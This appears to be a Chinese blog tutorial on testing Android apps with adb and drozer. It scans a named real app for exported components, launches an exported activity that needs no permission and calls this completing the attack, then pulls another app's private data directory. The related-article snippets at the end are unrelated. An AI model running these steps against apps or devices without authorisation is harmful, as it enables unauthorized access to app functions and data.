要用到的两个神器:abd&drozer

adb介绍

adb的全称为Android Debug Bridge,就是起到调试桥的作用,作为一名开发者倒是常用到这个工具.借助adb工具,我们可以管理设备或手机模拟器的状态。还可以进行很多手机操作,如安装软件、卸载软件、系统升级、运行shell命令等等。adb就是连接Android手机与PC端的桥梁,可以让用户在电脑上对手机进行全面的操作。

  drozer介绍

  Drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。

adb的连接:

C:\Users\def>adb connect 127.0.0.1:62001  #端口一般都是62001或者52001
already connected to 127.0.0.1:62001
C:\Users\def>adb shell
root@android:/ #

drozer的连接:

  在使用drozer连接之前需要使用adb将pc的tcp31415端口和模拟器进行转发:命令:adb forward tcp:31415 tcp:31415

D:\drozer>drozer console connect

Selecting 6a3a3c33280b7875 (OPPO R831T 4.4.)

            ..                    ..:.

           ..o..                  .r..

            ..a..  . ....... .  ..nd

              ro..idsnemesisand..pr

              .otectorandroidsneme.

           .,sisandprotectorandroids+.

         ..nemesisandprotectorandroidsn:.

        .emesisandprotectorandroidsnemes..

      ..isandp,..,rotectorandro,..,idsnem.

      .isisandp..rotectorandroid..snemisis.

      ,andprotectorandroidsnemisisandprotec.

     .torandroidsnemesisandprotectorandroid.

     .snemisisandprotectorandroidsnemesisan:

     .dprotectorandroidsnemesisandprotector.

drozer Console (v2.3.4)

dz>

复现activity案例:

  首先你要了解什么是activity:https://baike.baidu.com/item/activity/7304419?fr=aladdin

D:\drozer>drozer console connect #连接

Selecting 6a3a3c33280b7875 (OPPO R831T 4.4.)

            ..                    ..:.

           ..o..                  .r..

            ..a..  . ....... .  ..nd

              ro..idsnemesisand..pr

              .otectorandroidsneme.

           .,sisandprotectorandroids+.

         ..nemesisandprotectorandroidsn:.

        .emesisandprotectorandroidsnemes..

      ..isandp,..,rotectorandro,..,idsnem.

      .isisandp..rotectorandroid..snemisis.

      ,andprotectorandroidsnemisisandprotec.

     .torandroidsnemesisandprotectorandroid.

     .snemisisandprotectorandroidsnemesisan:

     .dprotectorandroidsnemesisandprotector.

dz> run app.package.attacksurface com.newland.mbop #运行 攻击面模块 要攻击的app

Attack Surface:
8 activities exported #存在八个activity可以调用,activity就是可以越。
2 broadcast receivers exported #存在2个broadcast receivers exported
1 content providers exported #存在1个content providers exported
2 services exported #存在2个services exported

dz> run app.activity.info -a com.newland.mbop
Package: com.newland.mbop
com.newland.mbop.activity.WelcomeActivity #这个是存在漏洞的一个activity,第一个是欢迎界面。
Permission: null
com.newland.mbop.activity.PrintActivity
Permission: null
com.newland.mbop.activity.BankCardReaderActivity
Permission: null
com.newland.mbop.activity.IdentifyCardReaderActivity
Permission: null
com.newland.mbop.activity.SimReaderActivity
Permission: null
com.newland.mbop.activity.ReadIDCardInfoActivity
Permission: null
com.newland.mbop.component.barcode.zxing.CaptureActivity
Permission: null
com.igexin.sdk.GActivity
Permission: null

dz> run app.activity.start --component com.newland.mbop com.newland.mbop.activity.SimReaderActivity #命令执行完即完成攻击

#app.activity.start是其攻击模块。

#--component指定包

#com.newland.mbop.activity.SimReaderActivity服务,使用app.activity.info的时候有显示出来。我选择了倒数第二个。

将缓存文件导入到test目录

adb pull /data/data/com.fjmcc.wangyoubao ./

app测试初窥的更多相关文章

  1. WWDC15 Session笔记 - Xcode 7 UI 测试初窥

    https://onevcat.com/2015/09/ui-testing/ WWDC15 Session笔记 - Xcode 7 UI 测试初窥 Unit Test 在 iOS 开发中已经有足够多 ...

  2. 【APP测试初体验】android测试命令----压力测试

    **以前一直做web测试,新一份工作新的开始,决定尝试新的测试,于是选择了一个从未接触的 APP测试. 怎么说呢,对于做web测试的人来说,app真的没有一点难度...测试流程一样,测试方法也差不多, ...

  3. 【APP测试初体验】android测试命令----adb常用命令

    --adb shell 命令adb devices 查看设备adb shell adb shell "ls -al /system/bin" >e:\a.txtsample_ ...

  4. iOS视频直播初窥:高仿<喵播APP>

    视频直播初窥 视频直播,可以分为 采集,前处理,编码,传输, 服务器处理,解码,渲染 采集: iOS系统因为软硬件种类不多, 硬件适配性比较好, 所以比较简单. 而Android端市面上机型众多, 要 ...

  5. 初窥Flask

    初窥Flask Flask是一个基于Python开发并且依赖jinja2模板和Werkzeug WSGI服务的一个微型框架,对于Werkzeug本质是Socket服务端,其用于接收http请求并对请求 ...

  6. Scrapy001-框架初窥

    Scrapy001-框架初窥 @(Spider)[POSTS] 1.Scrapy简介 Scrapy是一个应用于抓取.提取.处理.存储等网站数据的框架(类似Django). 应用: 数据挖掘 信息处理 ...

  7. 初窥Kaggle竞赛

    初窥Kaggle竞赛 原文地址: https://www.dataquest.io/mission/74/getting-started-with-kaggle 1: Kaggle竞赛 我们接下来将要 ...

  8. scrapy2_初窥Scrapy

    递归知识:oop,xpath,jsp,items,pipline等专业网络知识,初级水平并不是很scrapy,可以从简单模块自己写. 初窥Scrapy Scrapy是一个为了爬取网站数据,提取结构性数 ...

  9. Java发送邮件初窥

    一.背景 最近朋友的公司有用到这个功能,之前对这一块也不是很熟悉,就和他一起解决出现的异常的同时,也初窥一下使用Apache Common Email组件进行邮件发送. 二.Java发送邮件的注意事项 ...

随机推荐

  1. win7系统部分软件显示乱码怎么办

    用了Win7以后,发现有的中文软件打开后,在界面上出现很多文字乱码,之前这个软件在XP上用过,一直都是中文的,怎么到Win7上,就显示乱码了. 到网上一查,发现很多网友都有同样问题,经过一番查找,找到 ...

  2. 一个web.Config或app.Config自定义段configSections的示例

    一个web.Config或app.Config自定义段configSections的示例 越来越觉得,直接用配置文件app.Config或web.Config配置应用系统的运行参数,比自己做一个xml ...

  3. 浅谈 .NET 中的对象引用、非托管指针和托管指针 理解C#中的闭包

    浅谈 .NET 中的对象引用.非托管指针和托管指针   目录 前言 一.对象引用 二.值传递和引用传递 三.初识托管指针和非托管指针 四.非托管指针 1.非托管指针不能指向对象引用 2.类成员指针 五 ...

  4. golang 学习笔记 ---数组/字符串/切片

    数组 数组是一个由固定长度的特定类型元素组成的序列,一个数组可以由零个或多个元素组成.数组的长度是数组类型的组成部分.因为数组的长度是数组类型的一个部分,不同长度或不同类型的数据组成的数组都是不同的类 ...

  5. Oracle 12C -- plug unplugged PDB into CDB

    connetct to CDB as a common user and verify that pdb_test is closed SQL> select con_id,dbid,name, ...

  6. 采集java性能指标数据

    这里我们开发把每个服务的jvm的运行情况和gc的情况卸载java程序里,这里我们访问一个URL地址就可以得到json数据 #!/bin/bash # 定时收集java服务metrics # curl ...

  7. JavaScript DOM API初步(整理)

    文档对象模型 文档对象模型(Doucment Object Model,DOM)是表示文档(如HTML文档.XML文档)和访问.操作构成文档的各种元素的应用程序接口.在DOM中,HTML文档的层次结构 ...

  8. ThinkPHP32 MODULE_ALLOW_LIST 存在的bug 不生效

    1)BUG: 假设存在Api Home Admin Member 模块.仅仅想让用户訪问 Api Home,不同意訪问Admin Member. 必须将Admin Member 写在 MODULE_D ...

  9. 关于Suppressing notification from package com.xxx.xxx by user request.的异常

    其实以下都是废话. 如果你的测试的真机或者是模拟器是android4.1以上, 就有可能遇到这个Toast或者通知不能弹出. 自己不懂为什么. 想想你自己的应用设置是否有勾上这个 没有的话.就活该显示 ...

  10. JS验证邮箱格式是否正确 实例代码

    如何用js验证邮箱格式是否正确?分享一个例子.代码: /* *验证邮箱格式是否正确 *参数strEmail,需要验证的邮箱 */ function chkEmail(strEmail) { if (! ...